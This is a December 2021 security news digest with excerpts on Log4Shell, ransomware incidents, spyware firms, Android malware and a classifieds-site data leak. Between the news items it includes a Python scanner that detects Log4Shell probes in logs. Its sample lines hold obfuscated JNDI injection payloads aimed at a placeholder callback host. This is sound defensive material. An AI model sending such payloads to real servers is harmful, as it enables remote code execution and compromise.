December 17, 2021

Fortify Security Team

Title: Forcepoint Security News: Log4Shell Vulnerability, Pfizer Trade Secrets Exfiltration, Classifieds Site Leaked Personal Info via the F12 Key, and Hive Ransomware Enters Big League
Date Published: December 17, 2021

https://www.forcepoint.com/blog/x-labs/news-log4shell-pfizer-data-breach-hive-ransomware-gang

Excerpt: “The recently discovered Log4Shell vulnerability in the popular open source Log4j logging software lets an attacker gain access to a vulnerable system by sending a specially crafted text string to the system. That text string eventually gets logged by Log4j but is also interpreted as code to execute. This in turn is used to download malware and execute malware that can run cryptocurrency mining software, release sensitive data, be part of a DDoS attack on other systems, or execute ransomware. The exploit was first seen on sites hosting Minecraft servers, which discovered that attackers could trigger the vulnerability by posting chat messages.”

Title: Sainsbury’s Payroll Hit by Kronos Attack
Date Published: December 17, 2021

https://www.bbc.com/news/technology-59683889

Excerpt: “A UKG official told BBC News: ‘UKG recently became aware of a ransomware incident that has disrupted the Kronos Private Cloud, which houses solutions used by a limited number of our customers.’ It had taken immediate action to investigate and mitigate the issue, alerted affected customers and informed the authorities. ‘We recognise the seriousness of the issue and have mobilised all available resources to support our customers and are working diligently to restore the affected services,’ UKG added.”

Title: Facebook Exposes Mercenary Spy Firms That Targeted 50,000 People
Date Published: December 17, 2021

https://www.reuters.com/technology/facebook-exposes-mercenary-spy-firms-that-targeted-48000-people-2021-12-16/

Excerpt: “The company’s fight with the spy firms comes amid a wider move by American tech companies, U.S. lawmakers and President Joe Biden’s administration against purveyors of digital espionage services, notably the Israeli spyware company NSO Group, which was blacklisted earlier this month following weeks of revelations about how its technology was being deployed against civil society. Meta is already suing NSO in a U.S. court. Nathaniel Gleicher, Meta’s head of security policy, told Reuters that Thursday’s crackdown was meant to signal that ‘the surveillance-for-hire industry is much broader than one company’.”

Title: Backdoor Gives Hackers Complete Control over Federal Agency Network
Date Published: December 16, 2021

https://arstechnica.com/information-technology/2021/12/us-federal-agency-fails-to-respond-to-reports-it-has-been-backdoored/

Excerpt: “The backdoor works by replacing a normal Windows file named oci.dll with two malicious ones—one early in the attack and the other later on. The first imposter file implements WinDivert, a legitimate tool for capturing, modifying, or dropping network packets sent to or from the Windows network stack. The file allows the attackers to download and run malicious code on the infected system. Avast suspects the main purpose of the downloader is to bypass firewalls and network monitoring.”

Title: Google Unleashes Security ‘Fuzzer’ on log4shell Bug in Open-Source Software
Date Published: December 17, 2021

https://www.zdnet.com/article/google-unleashes-security-fuzzer-on-log4shell-bug-in-open-source-software/

Excerpt: “Log4j 2.16.0 disables access to JNDI by default and limits the default protocols to Java, LDAP and LDAPS. Disabling JNDI was previously a manual step to mitigate attacks against the original flaw. Most efforts are now focussed on vendors updating Log4j in their products and end-user organisations applying updates as they become available. For example, the US Cybersecurity and Infrastructure Security Agency (CISA) has given federal agencies until 24 December to identify all applications affected by Log4Shell. Cisco, VMware, IBM and Oracle are busy developing patches for their affected products.”
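The two Log4Shell items above (the Forcepoint summary of the crafted-string mechanism and the ZDNet note that 2.16.0 disables JNDI by default) describe the bug but not how to find exploit attempts in your own logs. The following is an added example, not code from either article or from the Log4j project: a small Python scanner that URL-decodes each line, collapses the nested `${lower:...}`, `${upper:...}` and `${...:-x}` lookups attackers used to evade naive `${jndi:` string matches, then extracts the JNDI protocol and callback host. The access-log lines are constructed for this example and the 198.51.100.7 addresses are documentation-range placeholders, not real indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not from any article).
# Line 1 is benign; lines 2-6 carry Log4Shell probes in increasingly evasive forms.
SAMPLE_LOGS = [
    '10.0.0.5 - - [17/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [17/Dec/2021:10:01:09 +0000] "GET /?q=${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [17/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [17/Dec/2021:10:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:dns://198.51.100.7/d}"',
    '10.0.0.9 - - [17/Dec/2021:10:01:18 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fe%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

# Innermost Log4j lookups only: the character class excludes "$", "{" and "}",
# so each pass resolves one nesting level and the loop in normalize() repeats.
LOOKUP_LOWER = re.compile(r"\$\{\s*lower\s*:([^${}]*)\}", re.IGNORECASE)
LOOKUP_UPPER = re.compile(r"\$\{\s*upper\s*:([^${}]*)\}", re.IGNORECASE)
# "${anything:-x}" is Log4j's default-value syntax; "${::-j}" resolves to "j".
LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# After normalisation the probe looks like "${jndi:ldap://host:port/path}".
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode and collapse nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)  # handles %24%7B... encodings, including double encoding
        text = LOOKUP_LOWER.sub(lambda m: m.group(1).lower(), text)
        text = LOOKUP_UPPER.sub(lambda m: m.group(1).upper(), text)
        text = LOOKUP_DEFAULT.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def scan(lines):
    """Return one hit per JNDI lookup found, with 1-based line number, protocol and target."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for match in JNDI.finditer(normalize(line)):
            hits.append({
                "line": number,
                "protocol": match.group(1).lower(),
                "target": match.group(2),  # attacker callback host[:port]
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']}: jndi {hit['protocol']} -> {hit['target']}")
```

Normalisation is the whole point: the third and fourth sample lines contain no literal `jndi` substring before the lookups are collapsed, so a plain grep for `${jndi:` misses them. Detection like this finds who was probing you; the fix is still the upgrade described in the excerpt above, since 2.16.0 disables JNDI access by default rather than relying on a manual opt-out.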

Title: Android Malware Warning: Over 500,000 Users Have Been Infected after Downloading This App from Google Play
Date Published: December 17, 2021

https://www.zdnet.com/article/over-half-a-million-users-been-infected-with-joker-malware-after-downloading-this-android-app-from-google-play/

Excerpt: “Once installed, the malware does three things: it simulates clicks in order to generate revenue from malicious ads; subscribes users to unwanted paid premium services to steal money and commit billing fraud; and accesses users’ contact lists and sends the information to attackers. Researchers suggest there’s evidence that stolen information is sent to servers hosted in Russia. Negative reviews of the app on the Play Store suggest that some users have noticed the unauthorised behaviour, with complaints about being charged for services they didn’t request access to.”

Title: Gumtree Classifieds Site Leaked Personal Info via the F12 Key
Date Published: December 16, 2021

https://www.bleepingcomputer.com/news/security/gumtree-classifieds-site-leaked-personal-info-via-the-f12-key/

Excerpt: “The consequences of having such data exposed are significant, as the leaked users could be targeted by phishing or social engineering attacks that use this information to try and harvest more sensitive information. The site also features an API exclusively used by the Gumtree app on iOS. Unfortunately, one of that API’s endpoints was vulnerable to an IDOR (insecure direct object references) attack, resulting in another leak of full names and other account info.”

Title: This Company Was Hit With Ransomware, but Didn’t Have to Pay Up. Here’s How They Did It
Date Published: December 17, 2021

https://www.zdnet.com/article/this-company-was-hit-with-ransomware-but-didnt-have-to-pay-up-heres-how-they-did-it/

Excerpt: “‘I was pretty confident about the data side of things – we use Rubrik. We make sure it’s got multi-factor authentication (MFA) on it and doesn’t have any shared credentials, so it’s a walled garden,’ says Day. ‘These people immediately want to go after your backups because that ratchets up pressure, so if they can’t get to your backups, you’re in a good place.’ But this didn’t stop the cyber criminals from attempting to extort a ransom payment – they emailed all the staff at Langs, claiming they’d stolen data and threatened to sell it on the dark web if a payment wasn’t received by a particular date.”

Title: New Pseudomanuscrypt Malware Infected over 35,000 Computers in 2021
Date Published: December 17, 2021

https://thehackernews.com/2021/12/new-pseudomanuscrypt-malware-infected.html

Excerpt: “The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group’s attack toolset, Kaspersky researchers said, characterizing the operation as a “mass-scale spyware attack campaign.” The Russian cybersecurity company said it first detected the series of intrusions in June 2021. At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9.3%).”

Title: NSW Government Casual Recruiter Suffers Ransomware Hit
Date Published: December 16, 2021

https://www.zdnet.com/article/nsw-government-casual-recruiter-suffers-ransomware-hit/

Excerpt: “IT recruitment firm Finite Recruitment has confirmed it experienced a cyber incident in October, which resulted in a ‘small subset’ of the company’s data being downloaded and published on the dark web. The Finite Group incident response team confirmed with ZDNet that when the incident occurred, business operations were not disrupted. ‘Our security monitoring systems identified and closed down the threat quickly,’ they said. ‘Since then, remedial works have been undertaken and the business has been fully operational’.”
